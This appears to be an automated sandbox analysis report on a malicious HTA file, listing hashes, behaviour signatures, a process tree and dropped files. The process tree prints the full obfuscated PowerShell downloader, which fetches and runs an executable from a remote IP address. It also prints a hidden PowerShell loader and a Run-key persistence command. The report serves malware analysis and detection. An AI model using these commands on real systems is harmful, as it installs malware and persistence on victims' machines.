Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
09/08/2024, 17:31
General
-
Target
IEexplore.hta
-
Size
199KB
-
MD5
a485f9c22bb28feb62d01c63e1cd9faa
-
SHA1
37466c9e52be071a2b9bb4606f358a7cbb05d0dc
-
SHA256
ce71b196e2d2e471973112e9ed9b9765927419eb31eb582786e0d022cd14af62
-
SHA512
f04576854bdfb62fe807b28b5acd330ebef1fa6c7a7e98fb3bf6c713faeec7c917f4030e7a56a4236269457be4b4c80d2d4e46fe7f351a0a26612cf599d94556
-
SSDEEP
768:tZ6A3yXNA0AGAuKMPjeSssA00SrsxDunbQiXAZO:tpsT
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
NSIS installer 2 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEexplore.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POWERsHEll.exE -EX BYPASs -NOp -W 1 -C DeVICEcrEDentiAlDePloYment.exE ; IEX($(IEX('[sySTEm.TEXt.EnCOdING]'+[ChaR]58+[cHAr]58+'UTf8.gETsTRINg([SyStEM.Convert]'+[CHar]58+[chAr]0x3A+'FrombaSE64sTriNg('+[chaR]0x22+'JHA2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9sU2ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdldpckdhYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGp2Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCS2gsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQnJRY2EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxWk5PRVFESXFKYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHA2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTQuMjM5LjExMi8xMTgvc2Fob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzYWhvc3RzLmV4ZSIsMCwwKTtzdGFSdC1zTGVFUCgzKTtTVGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzYWhvc3RzLmV4ZSI='+[cHAr]0x22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWERsHEll.exE -EX BYPASs -NOp -W 1 -C DeVICEcrEDentiAlDePloYment.exE ; IEX($(IEX('[sySTEm.TEXt.EnCOdING]'+[ChaR]58+[cHAr]58+'UTf8.gETsTRINg([SyStEM.Convert]'+[CHar]58+[chAr]0x3A+'FrombaSE64sTriNg('+[chaR]0x22+'JHA2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9sU2ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdldpckdhYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGp2Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCS2gsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQnJRY2EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxWk5PRVFESXFKYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHA2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTQuMjM5LjExMi8xMTgvc2Fob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzYWhvc3RzLmV4ZSIsMCwwKTtzdGFSdC1zTGVFUCgzKTtTVGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzYWhvc3RzLmV4ZSI='+[cHAr]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f5pvd44v\f5pvd44v.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA827.tmp" "c:\Users\Admin\AppData\Local\Temp\f5pvd44v\CSC28E44AA0847D480C92DA5CE52E6680BD.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\sahosts.exe"C:\Users\Admin\AppData\Roaming\sahosts.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Apologetics=Get-Content 'C:\Users\Admin\AppData\Local\Temp\ew\Tubolabellate255\drmmesynerne\Planular\Fikserbilleders.Suv';$Nybyggerens=$Apologetics.SubString(4057,3);.$Nybyggerens($Apologetics)"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Miljfarlig" /t REG_EXPAND_SZ /d "%skaberevnes% -windowstyle minimized $Irreconcilable=(Get-ItemProperty -Path 'HKCU:\Untranquilly\').Vnnedes;%skaberevnes% ($Irreconcilable)"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Miljfarlig" /t REG_EXPAND_SZ /d "%skaberevnes% -windowstyle minimized $Irreconcilable=(Get-ItemProperty -Path 'HKCU:\Untranquilly\').Vnnedes;%skaberevnes% ($Irreconcilable)"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD5f75f3c527570fc8ede01303fb00fddb1
SHA11046163598ecc2df7ed68460210e198ac893d102
SHA256c44afd60a363ccbe4704e8f7318652ed65c96be8603e88ef9f327c7860b9b35e
SHA512d4cdbb6f1fdfb0e009520a7628f1ffef5b4ea699a7ddae5ef4cbcef193baf694ef8f0de08fb4f7729acf98f8a7c7e14612dbb3f7cd486ce4064904acef2760b8
-
Filesize
1KB
MD5f1b1cf08596d8c13dc813c6c4297e164
SHA1016ac063c06f5f0b48bf19f0cb319dbdbda07169
SHA256e24e765a16d7341a9e4e0f5eebdd120210c9793d8f3e5ff6838dddeb10e22304
SHA512a98a867b22be5461646e492054e6883e9f61e191729d27b85cf5e87ac3da6cc48985eaf491f8fdd76569ffaa003fa8ed5eb49c68c7d40a836268bbc736c3456f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
381KB
MD5ffd943a215875808b58bfe8fb66dc36e
SHA12e3ccabd084b3335437166efac9b5f4e61a0ea5e
SHA25625e152e218163dbbb491f525eba3cd343ef10ef77dbf91f963e55a00f5256319
SHA512d6da2c9ef8b257d40f03c5c7364c6be64cfe3a7b53547a0764543341e6cd3e3995434f7148ac42522587f38a3793b0c600458ecddfa794db387733c1b0505212
-
Filesize
52KB
MD5c7e476eea30eca1676cb4a0f119ac5b6
SHA1d14ed291418432fd94da286500d1a4e462dc76aa
SHA25607b291f2c6b0c714dc3a608aeec0637845dd0c373c015e6d8d548dfa48aa7d9e
SHA512302eb4088b11bd4238071306200e52422da059ed4286890a84c6ca5acb40a30e96e33a898c7b23123f2e5fe1abaf677fe77266468be8dfed6523b18bd169f741
-
Filesize
3KB
MD52af67dda504fd79ff2526ff12e52f2a4
SHA1e3fd6be304b43b9c6f537a1bb4bc819cfdf5c955
SHA256a5618a2f0ebc608ea936b138be6b0af6589798ec1e47bbe161df399e8b957e25
SHA512feaaff640f0749c051677729e61d3ecd7ca4f25091efb1becde23f5fb6fffbf4726781476585402c804ff069a5f6047c4453600a15721880c66246fdeabfda1e
-
Filesize
806KB
MD59cef532829a4ca2cf13279ac134873d8
SHA168f4c94bf29fb0cbde97973083f85bf08382f2a2
SHA25661dcfda4694ea3f6bafab018feb9cbcaced299f1996b4a7adaf79a3a81cc788d
SHA512f938aa8fddeac26fc862c1bd312ac2ef57843e7922b4e14b4b69b8db9888bf250f5572df79fe13710df89293c116da144d7da90d0783b8e85e56d0791607d1b5
-
Filesize
652B
MD5aa5ab5a7ffe12f62987b0dad2a4eb9ce
SHA1dc5eeb0e5977226f288c71707f4d1844d89e38f9
SHA25621b95e4e30c885cf847d2326ab068036fb8529bf4cf48b77d382bd8177227136
SHA512a51aad210d66c55296c3e94dc5ff25c62ff081b1c8464af6e08156f7ff4cbf54883679c6cea3b4bad23c39a660b591cbf52d5655a84d3c1baa28360f0eb1b7fb
-
Filesize
468B
MD5ca0fe631137d6b033b7fa2e2e2f62693
SHA1590b15a191bd62f30b452ec127c55cc4917c196b
SHA2569eb316169b7baea85df3c8632eb0836eadc9395ff1a769a5d424bb7f0a276cca
SHA5127e4f575f6456a58834601cb6c8c6c5792f8133d57dec131f4edda666861dea51a159c4957f5d923c6f237289f5c99b6f555c089ecca0d9a8f7a2db7ef892564b
-
Filesize
369B
MD506da83909df137941f56e21f5b922c8c
SHA157f1493ec03ff600e54d5077400a20148fda5dd3
SHA256ad813c7651cc42a6ff9244d5b47707e8a488fbafb981721e1a408c64b556425e
SHA5121eac2c08c0c2da93c173f4d04d66aef42b31fe7e3e06270ba1736a8498c85ef4744e5700e985502743791a10e6613166e62a46497f6372de784813bf978b0d41
-
Filesize
3.3MB
-
Filesize
78.9MB
-
Filesize
18.3MB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
216KB